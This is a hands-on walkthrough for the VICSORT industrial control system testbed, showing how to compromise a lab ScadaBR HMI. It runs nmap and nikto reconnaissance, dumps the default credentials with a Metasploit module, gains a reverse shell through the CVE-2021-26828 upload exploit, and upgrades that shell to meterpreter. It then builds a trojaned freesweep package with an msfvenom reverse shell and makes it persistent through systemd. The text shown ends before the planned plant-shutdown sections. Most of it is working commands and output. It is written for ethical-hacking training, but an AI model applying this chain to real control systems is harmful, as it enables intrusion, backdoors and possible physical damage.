# VICSORT ICS Cyber-attack Scenario

This guide documents an ICS cyber-attack scenario and serves as a practical usecase for the VICSORT testbed.
Use the provided guide as reference and feel free build onto it.
This is a testing environment where you can safely assess and enhance your ethical hacking skills.

## Table Of Contents
- [VICSORT ICS Cyber-attack Scenario](#vicsort-ics-cyber-attack-scenario)
  * [Reconnaissance](#reconnaissance)
    + [Netdiscover](#netdiscover)
    + [Nmap](#nmap)
  * [Exploitation and Privilege Escalation](#exploitation-and-privilege-escalation)
  * [Persistence](#persistence)
    + [Setting up Apt-cacher-ng](#setting-up-apt-cacher-ng)
    + [Creating Binary Linux Trojan](#creating-binary-linux-trojan)
    + [Testing Backdoor](#testing-backdoor)
    + [Making the Backdoor Persistent](#making-the-backdoor-persistent)
    + [Connecting to Persistent BackDoor](#connecting-to-persistent-backdoor)
- [Attacking the ICS](#attacking-the-ics)
  * [Exfiltrating Data from HMI](#exfiltrating-data-from-hmi)
  * [Manipulating the values displayed on the HMI](#manipulating-the-values-displayed-on-the-hmi)
    + [Redirect Modbus Traffic to HMI](#redirect-modbus-traffic-to-hmi)
    + [Handle Modbus Requests made to attacker](#handle-modbus-requests-made-to-attacker)
    + [Create Modbus Server on attacker](#create-modbus-server-on-attacker)
    + [Redirecting PLC destined for traffic to attacker](#redirecting-plc-destined-for-traffic-to-attacker)
  * [Remotely shutdown the plant](#remotely-shutdown-the-plant)
    + [Manipulating HMI values during plant shutdown](#manipulating-hmi-values-during-plant-shutdown)
  * [Catastrophic Damage to the Environment](#catastrophic-damage-to-the-environment)
    + [Modifying the PLC Code](#modifying-the-PLC-Code)
    + [Uploading new PLC Code to PLC](#uploading-new-PLC-Code-to-PLC)
- [Conclusion](#conclusion)



The guide assumes you have the VICSORT VM setup on your PC within virtualbox.

As a recap, this is the environment network topology

![topology](../figures/VICSORT_Topology_1.png)


To start the testbed, run the command:

~~~bash
# Assumes Bridged adapter settings for the VM
vicsort@vicsort:~$ sudo su
root@vicsort:/home/vicsort# dhclient -v
root@vicsort:/home/vicsort# testbed_startup 

# You should have your containers up and running as below
# If not, run the testbed_startup command again
# If not, run the testbed_startup command again
root@vicsort:/home/vicsort# lxc list
+-----------------------+---------+-----------------------+------+-----------+-----------+
|         NAME          |  STATE  |         IPV4          | IPV6 |   TYPE    | SNAPSHOTS |
+-----------------------+---------+-----------------------+------+-----------+-----------+
| attacker-container    | RUNNING | 192.168.90.197 (eth1) |      | CONTAINER | 0         |
+-----------------------+---------+-----------------------+------+-----------+-----------+
| hmi-container         | RUNNING | 192.168.90.5 (eth1)   |      | CONTAINER | 0         |
+-----------------------+---------+-----------------------+------+-----------+-----------+
| plc-container         | RUNNING | 192.168.95.2 (eth1)   |      | CONTAINER | 0         |
+-----------------------+---------+-----------------------+------+-----------+-----------+
| simulation-container  | RUNNING | 192.168.95.15 (eth7)  |      | CONTAINER | 0         |
|                       |         | 192.168.95.14 (eth6)  |      |           |           |
|                       |         | 192.168.95.13 (eth5)  |      |           |           |
|                       |         | 192.168.95.12 (eth4)  |      |           |           |
|                       |         | 192.168.95.11 (eth3)  |      |           |           |
|                       |         | 192.168.95.10 (eth2)  |      |           |           |
+-----------------------+---------+-----------------------+------+-----------+-----------+
| workstation-container | RUNNING | 192.168.95.5 (eth1)   |      | CONTAINER | 0         |
+-----------------------+---------+-----------------------+------+-----------+-----------+
~~~

## Reconnaissance

From the attacker container, we would like to know whats visible to us.
In this stage, we shall gather information about nodes available on the network and take it from there.
Its assumed that attacker has successfully managed to breach the environment though the IT network and is now in the DMZ.


Footprinting is the procedure whereby as much information as possible is gathered concerning a
target. In footprinting, the objective is to obtain specific details about the target, such as its operating
systems and the service versions of running applications. The information that's collected can be used
in various ways to gain access to the target system, network, or organization.

Launch *wireshark* on the attacker-container by rdping to the container. The idea here is to see if you can passively pick
up on any interesting network activity going on, on the network.

attacker-container credentials are:

- Username: *kali*
- Password: *kali*


> Each time you restart the testbed and log into the attacker-container, ensure that you run the command `msfdb init`. This shall help with msfconsole connections later on in the exercise.

~~~bash
vicsort@vicsort:~$ rdp_attacker 

# From terminal opened within attacker-container
# Open Wireshark and listen on eth1
kali@attacker-container:~$ sudo wireshark
[sudo] password for kali: 
 ** (wireshark:731) 09:46:58.496093 [GUI WARNING] -- QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
~~~

As shown in screenshot below, nothing significant shows up on the wireshark capture. It's fair to assume that 192.168.90.1 is our DHCP server.

![wireshark1](../figures/cyber_attack_scenario/wireshark1.png)


### Netdiscover

Netdiscover is a scanning tool that uses Address Resolution Protocol (ARP) messages to
identify live systems on a network. Using the `–r` syntax allows you to specify a range when
scanning.

I use netdiscover to discover other hosts on the network.
The results of the scan are below.

~~~bash
kali@attacker-container:~$ sudo netdiscover -i eth1 -r 192.168.90.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 168
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.90.1    00:16:3e:56:4f:b1      2      84  Xensource, Inc.
 192.168.90.5    00:16:3e:63:0d:8b      1      42  Xensource, Inc.
 192.168.90.100  52:54:00:d7:8f:bd      1      42  Unknown vendor
~~~

We are now aware of the following hosts:
- **192.168.90.197**: attacker-container
- **192.168.90.100**: default gateway. This must as well be the firewall in the network. Firewalls would typically be the default gateways to manage traffic in and out of the network
- **192.168.90.1**: Most likely DHCP Server
- **192.168.90.5**: ??

*192.168.90.5* is an interesting node. Worth doing abit of research on it.


### Nmap


I use nmap to verify my findings and possibly do further recon.
I specify the environment DNS server to resolve any IPs within the network.

~~~bash
┌──(root💀attacker-container)-[~]
└─# nmap --dns-servers 192.168.90.1 -sn 192.168.90.0/24 --exclude 192.168.90.1,192.168.90.100,192.168.90.197
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 11:23 GMT
Nmap scan report for hmi-container.lxd (192.168.90.5)
Host is up (0.000044s latency).
MAC Address: 00:16:3E:63:0D:8B (Xensource)
Nmap done: 253 IP addresses (1 host up) scanned in 1.92 seconds
~~~

Looks like node _192.168.90.5_ is an HMI.

After discovering the hosts on a network, the next phase is to identify any open service ports on the
target system and determine which services are mapped to those open ports.

~~~bash
┌──(root💀attacker-container)-[~]
└─# nmap 192.168.90.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 11:26 GMT
Nmap scan report for hmi-container.lxd (192.168.90.5)
Host is up (0.0000040s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
8009/tcp open  ajp13
9090/tcp open  zeus-admin
MAC Address: 00:16:3E:63:0D:8B (Xensource)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

┌──(root💀attacker-container)-[~]
└─# nmap 192.168.90.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 11:26 GMT
Nmap scan report for 192.168.90.100
Host is up (0.0048s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
MAC Address: 52:54:00:D7:8F:BD (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds
~~~

Open ports can be used as doorways into a target machine.
It would appear that there is a service running on the HMI container.
The default gateway also has port 80 open suggesting a web server running on it, SSH is open. There is also a DNS server running there too.

Next would be to perform an advanced search to determine target's OS, and other system parameters.

Let's take a look at the syntax used in the preceding command:
- `–A`: This enables Nmap to profile the target to identify its operating system, service versions, and script scanning, as
  well as perform a traceroute.
- `-T`: This syntax specifies the timing options for the scan, which ranges from 0 – 5, where 0 is very slow and 5 is the
  fastest. This command is good for preventing too many probes from being sent to the target too quickly.
- `-p`: Using the –p syntax allows you to specify which port(s) to identify as opened or closed on a target. You can
  specify –p80 to scan for port 80 only on the target and –p- to scan for all 65,535 open ports on a target.


~~~bash
┌──(root💀attacker-container)-[~]
└─# nmap -A -T4 -p- 192.168.90.5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 11:32 GMT
Nmap scan report for hmi-container.lxd (192.168.90.5)
Host is up (0.000040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods:
|   Supported methods: GET HEAD POST PUT DELETE OPTIONS
|   Potentially risky methods: PUT DELETE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
9090/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
| http-methods:
|_  Potentially risky methods: PUT DELETE
MAC Address: 00:16:3E:63:0D:8B (Xensource)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.04 ms hmi-container.lxd (192.168.90.5)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
~~~~

Running the above shows that there is a tomcat server running on port 9090 in this server. The HMI web GUI must be hosted here.
This is also a Linux box.
The next question would be finding out exactly where the HMI is hosted.

![apache](../figures/cyber_attack_scenario/apache.png)



Running the same on the gateway, we can see that this is pfsense firewall being implemented.

~~~bash
┌──(root💀attacker-container)-[~]
└─# nmap  -A -T4 -p- 192.168.90.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 11:32 GMT
Nmap scan report for 192.168.90.100
Host is up (0.0016s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT   STATE SERVICE    VERSION
22/tcp open  tcpwrapped
53/tcp open  tcpwrapped
80/tcp open  tcpwrapped
|_http-title: pfSense - Login
MAC Address: 52:54:00:D7:8F:BD (QEMU virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): FreeBSD 11.X (91%)
OS CPE: cpe:/o:freebsd:freebsd:11.2
Aggressive OS guesses: FreeBSD 11.2-RELEASE (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.63 ms 192.168.90.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 345.31 seconds
~~~


Connecting to http://192.168.90.100 does indeed bring up the pfsense firewall page. At the moment, this isn't of much interest of us.

![pfsense_login](../figures/cyber_attack_scenario/pfsense_login.png)

Back to the HMI, attempt to find out which HMI is running on this host.

I tried the following modules on msfconsole with no luck. Used the search parameter `search type:exploit platform:linux name:tomcat rank:excellent`

- auxiliary/scanner/http/tomcat_mgr_login
- exploit/multi/http/tomcat_jsp_upload_bypass
- exploit/multi/http/struts2_namespace_ognl
- exploit/multi/http/struts_dev_mode
- exploit/multi/http/tomcat_mgr_deploy
- exploit/multi/http/tomcat_mgr_upload

To launch metasploit:

~~~bash
┌──(root💀attacker-container)-[~]
└─# msfdb init
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

┌──(root💀attacker-container)-[~]
└─# systemctl start postgresql


# Launch the Metasploit Console
┌──(root💀attacker-container)-[~]
└─# msfconsole
Metasploit tip: Use help command to learn more about any command

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v6.3.51-dev                          ]
+ -- --=[ 2384 exploits - 1235 auxiliary - 418 post       ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[*] Starting persistent handler(s)...
msf6 >

msf6 > db_connect -y /usr/share/metasploit-framework/config/database.yml
[-] Connection already established. Only one connection is allowed at a time.
[-] Run db_disconnect first if you wish to connect to a different data service.

Current connection information:
[*] Connected to msf. Connection type: postgresql.
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
~~~

I attempt to scan the web server on port 9090 for index pages using `nikto`. This would show me the index pages that
the web server serves.

~~~bash
┌──(root💀attacker-container)-[~]
└─# nikto -host 192.168.90.5 -p 9090
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.90.5
+ Target Hostname:    192.168.90.5
+ Target Port:        9090
+ Start Time:         2023-12-18 11:19:47 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ Multiple index files found: /index.html, /index.jsp.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Cookie JSESSIONID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /manager/html: The detailed Tomcat version is disclosed in error pages.
+ /manager/html: Default Tomcat Manager / Host Manager interface found.
+ /host-manager/html: The detailed Tomcat version is disclosed in error pages.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/status: The detailed Tomcat version is disclosed in error pages.
+ /manager/status: Default Tomcat Server Status interface found.
+ 8406 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-01-18 11:19:58 (GMT0) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
~~~~

This unfortunately doesnt give us any indication of the index page for the HMI hosted here. I also explored tools like `DirBuster`, `Dirsearch` and `GoBuster` in vain.
Unfortunately, identifying specific servlets or applications running on a web server, especially if you don't have prior information about them, can be challenging.

Seeing as most of the utilities are not yielding fruit, doing a google search for `HMI, port "9090"` returns a couple of results.
A number of HMIs run on port 9090 such as JBoss, InTouch,WinCC, Prosys OPC UA Serrver, Ignition, Beckhoff TwinCAT HMI, Rockwell Automation FactoryTalk.
I search through all of them by a trial and error process.


This [link]("https://openplc.discussion.community/post/raspberry-pi-scadabr-9878969?trail=30") mentions ScadaBR running on port 9090.
Another quick google search about ScadaBR reveals that the HMI can be accessed via `http://192.168.90.5:9090/ScadaBR`.

We are then presented with a login screen.

![scadabr_login](../figures/cyber_attack_scenario/ScadaBR_login.png)

I head onto msfconsole and search for any exploits in the line of Scadabr.

~~~bash
msf6 > search scadabr

Matching Modules
================

   #  Name                                          Disclosure Date  Rank    Check  Description
   -  ----                                          ---------------  ----    -----  -----------
   0  auxiliary/admin/http/scadabr_credential_dump  2017-05-28       normal  No     ScadaBR Credentials Dumper


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/http/scadabr_credential_dump

msf6 > use 0
msf6 auxiliary(admin/http/scadabr_credential_dump) > set rhosts 192.168.90.5
rhosts => 192.168.90.5
msf6 auxiliary(admin/http/scadabr_credential_dump) > set rport 9090
rport => 9090
msf6 auxiliary(admin/http/scadabr_credential_dump) > run
[*] Running module against 192.168.90.5

[+] 192.168.90.5:9090 Authenticated successfully as 'admin'
[+] 192.168.90.5:9090 Export successful (213873 bytes)
[+] Config saved in: /root/.msf4/loot/20231120160315_default_192.168.90.5_scadabr.config_447191.txt
[+] Found 1 users
[*] Found weak credentials (admin:admin)

ScadaBR User Credentials
========================

 Username  Password  Hash (SHA1)                               Role   E-mail
 --------  --------  -----------                               ----   ------
 admin     admin     d033e22ae348aeb5660fc2140aec35850c4da997  Admin  admin@yourMangoDomain.com


ScadaBR Service Credentials
===========================

 Service  Host  Port  Username  Password
 -------  ----  ----  --------  --------

[*] Auxiliary module execution completed
~~~

Looks like this environment is using default credentials.
With `username:admin, password:admin`, I am able to log into the HMI successfully and view the environment.

## Exploitation and Privilege Escalation

The next stage would be to explore how to get root access and possibly escalate privileges.

A simple google search for ScadaBR CVEs reveals [CVE-2021-26828]("https://packetstormsecurity.com/files/162564/ScadaBR-1.0-1.1CE-Linux-Shell-Upload.html")
 that allows remote authenticated users to [upload]("https://nvd.nist.gov/vuln/detail/CVE-2021-26828") and execute arbitrary JSP files via view_edit.shtm.

A script is also available on [Github]("https://github.com/h3v0x/CVE-2021-26828_ScadaBR_RCE/blob/main/WinScada_RCE.py").
Note that this script is a python2 script.


~~~bash
┌──(root💀attacker-container)-[~]
└─# git clone https://github.com/h3v0x/CVE-2021-26828_ScadaBR_RCE.git
Cloning into 'CVE-2021-26828_ScadaBR_RCE'...
remote: Enumerating objects: 56, done.
remote: Counting objects: 100% (56/56), done.
remote: Compressing objects: 100% (51/51), done.
remote: Total 56 (delta 27), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (56/56), 112.18 KiB | 1.46 MiB/s, done.
Resolving deltas: 100% (27/27), done.

┌──(root💀attacker-container)-[~]
└─# ls
CVE-2021-26828_ScadaBR_RCE

┌──(root💀attacker-container)-[~]
└─# cd CVE-2021-26828_ScadaBR_RCE/

┌──(root💀attacker-container)-[~/CVE-2021-26828_ScadaBR_RCE]
└─# chmod +x *.py

┌──(root💀attacker-container)-[~/CVE-2021-26828_ScadaBR_RCE]
└─# python2 LinScada_RCE.py 192.168.90.5 9090 admin admin 192.168.90.197 4444

+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|    _________                  .___     ____________________       |
|   /   _____/ ____ _____     __| _/____ \______   \______   \      |
|   \_____  \_/ ___\__  \   / __ |\__  \ |    |  _/|       _/       |
|   /        \  \___ / __ \_/ /_/ | / __ \|    |   \|    |   \      |
|  /_______  /\___  >____  /\____ |(____  /______  /|____|_  /      |
|          \/     \/     \/      \/     \/       \/        \/       |
|                                                                   |
|    > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload (CVE-2021-26828)  |
|    > Exploit Author : Fellipe Oliveira                            |
|    > Exploit for Linux Systems                                    |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+

[+] Trying to authenticate http://192.168.90.5:9090/ScadaBR/login.htm...
[+] Successfully authenticated! :D~

[>] Attempting to upload .jsp Webshell...
[>] Verifying shell upload...

[+] Upload Successfuly!

[+] Webshell Found in: http://192.168.90.5:9090/ScadaBR/uploads/6.jsp
[>] Spawning Reverse Shell...

[+] Connection received
~~~~

In a separate terminal, have the following command running:

~~~bash
# In a separate terminal
┌──(root💀attacker-container)-[~]
└─# nc -vnlp 4444
listening on [any] 4444 ...
connect to [192.168.90.197] from (UNKNOWN) [192.168.90.5] 44530

whoami
root


pwd
/opt/tomcat6/apache-tomcat-6.0.53/bin
~~~

This demonstrates that we now have pawned the HMI container.
I'll try and get this shell within metasploit instead of using `nc`. That would provide more functionality.

~~~bash
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set PAYLOAD linux/x64/shell_reverse_tcp
PAYLOAD => linux/x64/shell_reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.90.197
lhost => 192.168.90.197

msf6 exploit(multi/handler) > set lport 4444
lport => 4444

msf6 exploit(multi/handler) > run

# Run the LinScada_RCE.py file again

[*] Started reverse TCP handler on 192.168.90.197:4444
[*] Command shell session 1 opened (192.168.90.197:4444 -> 192.168.90.5:43386) at 2023-11-20 19:55:04 +0000

whoami
root

background
Background session 1? [y/N]  y
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x64/linux               192.168.90.197:4444 -> 192.168.90.5:43386 (192.168.90.5)

# Upgrade current shell to meterpreter shell
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.90.197:4433
[*] Sending stage (1017704 bytes) to 192.168.90.5
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(multi/handler) > [*] Meterpreter session 3 opened (192.168.90.197:4433 -> 192.168.90.5:47790) at 2023-11-20 20:12:59 +0000

[*] Stopping exploit/multi/handler

msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information          Connection
  --  ----  ----                   -----------          ----------
  1         shell x64/linux                             192.168.90.197:4444 -> 192.168.90.5:43386 (192.168.90.5)
  3         meterpreter x86/linux  root @ 192.168.90.5  192.168.90.197:4433 -> 192.168.90.5:47790 (192.168.90.5)

msf6 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: root
~~~

Now that we have a shell to the host, next thing is to establish persistence.

## Persistence

### Setting up Apt-cacher-ng


The HMI has no internet access. Much as I dont particularly use this step in this section, it will be useful later. 
During my testing, it was relavant incase I needed
to install any packages on the HMI.

I use the attacker container as an apt repo for the HMI. This means any repo dependancies that
the HMI needs to pick, it will get from the attacker. This [guide]("https://www.tecmint.com/apt-cache-server-in-ubuntu/") is helpful for this procedure.


`apt-cacher-ng` is a caching proxy server for Debian-based distributions (those that use the APT package management system, like Ubuntu).
It is designed to cache the packages downloaded from the Debian repositories or any other repositories that use HTTP/HTTPS. This tool is especially useful in environments where multiple Debian-based systems are used, as it helps reduce bandwidth usage and speeds up package installation and updates.

`apt-cache-ng` is really cool because much as the HMI doesnt have internet, you are still able to install packages successfully
by proxying your requests through the attacker-container which has an internet connection.

On the attacker-container
~~~~bash
apt install apt-cacher-ng

# Uncomment the Port and PidFile line and add the BindAddress line, and save
nano /etc/apt-cacher-ng/acng.conf
  Port:3142
  BindAddress: 0.0.0.0
  PidFile: /var/run/apt-cacher-ng/pid

# Restart the service
/etc/init.d/apt-cacher-ng restart
~~~~

You can confirm the server is working by visiting `http://192.168.90.197:3142/`

Back to our meterpreter shell, we can modify the apt repo setting for the HMI.

~~~bash
meterpreter > shell
Process 2965105 created.
Channel 7 created.

echo 'Acquire::http::Proxy "http://192.168.90.197:3142";' >> /etc/apt/apt.conf.d/02proxy

cat /etc/apt/apt.conf.d/02proxy
Acquire::http::Proxy "http://192.168.90.197:3142";

# We shall go ahead and upgrade the packages on the HMI before going ahead to install our malicious code.
# The HMI shall pick the package updates through the attacker-container's internet connection. Pretty cool.
apt update

# You can verify that the HMI is actually connecting to the attacker for its apt requests using `tail -f /var/log/apt-cacher-ng/apt-cacher.log`.
# Then run apt update again on the HMI.
# You can actually upgrade the packages on the HMI if you wanted to, but thats not my interest here.
~~~




### Creating Binary Linux Trojan

In this process, there was a challenge in that the HMI has a rather low version of `glibc`, required for this step.

As such, to host my trojan, I use an older version of freesweep which requires a lower glibc version to run. 
I also made a couple of tweaks to the malware creation process to ensure it implements smoothly.


~~~bash
# On the attacker container
cd /root
wget http://archive.ubuntu.com/ubuntu/pool/universe/f/freesweep/freesweep_1.0.1-1_amd64.deb
dpkg -x freesweep_1.0.1-1_amd64.deb malware

# Create a folder called DEBIAN within the malware folder
mkdir -p malware/DEBAIN
cd -p malware/DEBAIN


# Create a file named control with the contents below in the DEBIAN dir
cat control
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.


# Create a post-installation script that will execute our binary.
# In our DEBIAN directory, we’ll create another file named postinst that contains the following
cat postinst
#!/bin/sh
sudo /usr/games/freesweep &


┌──(root💀attacker-container)-[~/malware/DEBAIN]
└─# ls
control  postinst


# Create malicious payload. THis shall override the legitimate freesweeo game with the malicious payload
msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.90.197 LPORT=8443 -b "\x00" -f elf -o /root/malware/usr/games/freesweep

chmod 755 malware/DEBIAN/postinst
chown :games malware/usr/games/freesweep
chmod 2755 malware/usr/games/freesweep
dpkg-deb --build malware/
mv malware.deb freesweep.deb
~~~~

Upload the new copy of the code to the HMI and install it

~~~bash
meterpreter > upload /root/freesweep.deb /var/cache/apt/archives/
[*] Uploading  : /root/freesweep.deb -> /var/cache/apt/archives/freesweep.deb
[*] Completed  : /root/freesweep.deb -> /var/cache/apt/archives/freesweep.deb
~~~

### Testing Backdoor
As shown below, I install the package, and the backdoor is executed using `/usr/games/freesweep`.
Note that this approach holds the shell open as long as there is a successful external connection to it.
Therefore, it's good to run the exploit in the background using `/usr/games/freesweep &`.

Note that `freesweep` needs to be running for the attacker to successfully connect to the backdoor. So there is need to ensure that the application always runs.


~~~bash
meterpreter > shell
Process 37026 created.
Channel 2 created.

dpkg -i /var/cache/apt/archives/freesweep.deb
Selecting previously unselected package freesweep.
(Reading database ... 19433 files and directories currently installed.)
Preparing to unpack .../apt/archives/freesweep.deb ...
Unpacking freesweep (1.0.1-1) ...
Setting up freesweep (1.0.1-1) ...
Processing triggers for mime-support (3.64ubuntu1) ...

~~~~

The `freesweep` backdoor is designed to start running as soon as its installed.

To test out the backdoor, on the attacker-container, run the command below in a separate window:

>  Before executing the command below, **ensure** that msfdb has been initiated, otherwise, the command will through an error. <br>
   This is documented in the namp section. Simply run `msfdb init`.

~~~bash
msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.90.197; set LPORT 8443; run; exit -y"
~~~


As seen in the screenshot, I am able to successfully connect to the backdoor and execute commands.

![backdoor](../figures/cyber_attack_scenario/backdoor1.png)

> When you terminate the backdoor session on the attacker-container, it kills the `/usr/games/freesweep` application 
> on the HMI. You would need to relaunch `freesweep` again on the HMI to use the backdoor.


A couple of interesting things to note about this backdoor: 

- On the HMI itself, before the attacker connects to the backdoor, and whilst the HMI backdoor
  is listening for a connection, you don't see any listening ports show up from `netstat -lntp` point of view.
-  From a sockets point of view, you only see an entry once a connection has been established to the backdoor. 
- However, given that I know exactly which port the backdoor is listening to, i.e.8443, and I currently have an established connection, I am able to see that under `netstat` sockets.

~~~bash
root@hmi-container:~# netstat -a | grep 8443
tcp        0      0 hmi-container.lxd:47630 attacker-container:8443 ESTABLISHED
~~~~

From a process point of view, we can indeed see the application, if we search for it.
~~~bash
root@hmi-container:~# ps aux | grep freesweep
root       25062  100  0.0   2944  1420 ?        R    19:13  77:46 /usr/games/freesweep
root       48947  0.0  0.0  10760   532 pts/3    S+   20:31   0:00 grep --color=auto freesweep
~~~

The screenshot below shows that the TCP connection created by the backdoor is not immediately apparent on the HMI.

![backdoor3](../figures/cyber_attack_scenario/backdoor3.png)

From a CPU utilisation point of view, with a connection to the backdoor, the CPU utilisation is negligable.
However, if for some reason you didn't terminate the session well, which sometimes happens when you launch `/usr/games/freesweep`
via the meterpreter session, you may see the `freesweep` application drawing high CPU, i.e. 100 %.
I address this in the next section.

### Making the Backdoor Persistent

The requirement here is that `/usr/games/freesweep` should always be running. This means that it should start automatically on boot
and if the application is killed, it should automatically restart.

To achieve this, I create a `systemd` service unit. However, remember we are working with limited shell capability here.
So doing things like editing files and the like is bound to be abit tricky. As such, I'll add the backdoor to msfconsole, and
incase any files need to be edited, edit them from the *attacker-container* and simply upload them to the HMI via my meterpreter shell.


~~~bash
# On the attacker container
cd /root/

# create the file below and append the contents to it
nano freesweep.service
[Unit]
Description=Freesweep Application Service

[Service]
ExecStart=/usr/games/freesweep
Restart=always
RestartSec=3

[Install]
WantedBy=multi-user.target

# Upload the file to the HMI
meterpreter > upload /root/freesweep.service /etc/systemd/system/
[*] Uploading  : /root/freesweep.service -> /etc/systemd/system/freesweep.service
[*] Completed  : /root/freesweep.service -> /etc/systemd/system/freesweep.service


# back to our backdoor session
meterpreter > shell
Process 2960481 created.
Channel 5 created.

# You can upgrade your meterpreter session by running the command
python3 -c 'import pty; pty.spawn("/bin/bash")'

root@hmi-container:/root# systemctl daemon-reload

root@hmi-container:/root# systemctl enable freesweep.service
Created symlink /etc/systemd/system/multi-user.target.wants/freesweep.service → /etc/systemd/system/freesweep.service.
root@hmi-container:/root#

root@hmi-container:/root# systemctl start freesweep.service

root@hmi-container:/root# systemctl status freesweep.service
● freesweep.service - Freesweep Application Service
     Loaded: loaded (/etc/systemd/system/freesweep.service; enabled; vendor preset: enabled)
    Drop-In: /run/systemd/system/service.d
             └─zzz-lxc-service.conf
     Active: active (running) since Thu 2023-11-30 21:24:11 GMT; 24s ago
   Main PID: 65030 (freesweep)
      Tasks: 1 (limit: 4588)
     Memory: 176.0K
     CGroup: /system.slice/freesweep.service
             └─65030 /usr/games/freesweep

Nov 30 21:24:11 hmi-container systemd[1]: Started Freesweep Application Service.
